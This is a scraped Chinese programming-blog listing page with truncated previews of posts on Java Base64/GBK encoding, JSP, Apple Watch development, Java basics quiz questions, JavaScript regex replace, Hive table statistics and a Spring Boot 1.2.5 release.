    String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式,注意用于加密,解密的要是同
  • JavaWeb之JSP概述 ihuning javaweb
      什么是JSP?为什么使用JSP? JSP表示Java Server Page,即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。   JSP起源    在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。  如果使用Servl
  • apple watch 指南 啸笑天 apple
    1. 文档 WatchKit Programming Guide(中译在线版 By @CocoaChina) 译文 译者 原文 概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
  • java经典的基础题目 macroli java编程
    1.列举出 10个JAVA语言的优势 a:免费,开源,跨平台(平台独立性),简单易用,功能完善,面向对象,健壮性,多线程,结构中立,企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包,类,接口,对象,属性,方法,构造器,继承,封装,多态,抽象,范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
  • 你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象regex
    var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
  • [一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hivehive分析表hive统计信息hive Statistics
    关键字:Hive统计信息、分析Hive表、Hive Statistics   类似于Oracle的分析表,Hive中也提供了分析表和分区的功能,通过自动和手动分析Hive表,将Hive表的一些统计信息存储到元数据中。   表和分区的统计信息主要包括:行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等;   14.1 新表的统计信息 对于一个新创建
  • Spring Boot 1.2.5 发布 wiselyman spring boot
        Spring Boot 1.2.5已在7月2日发布,现在可以从spring的maven库和maven中心库下载。   这个版本是一个维护的发布版,主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。   官方建议所有的Spring Boot用户升级这个版本。   项目首页 | 源
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他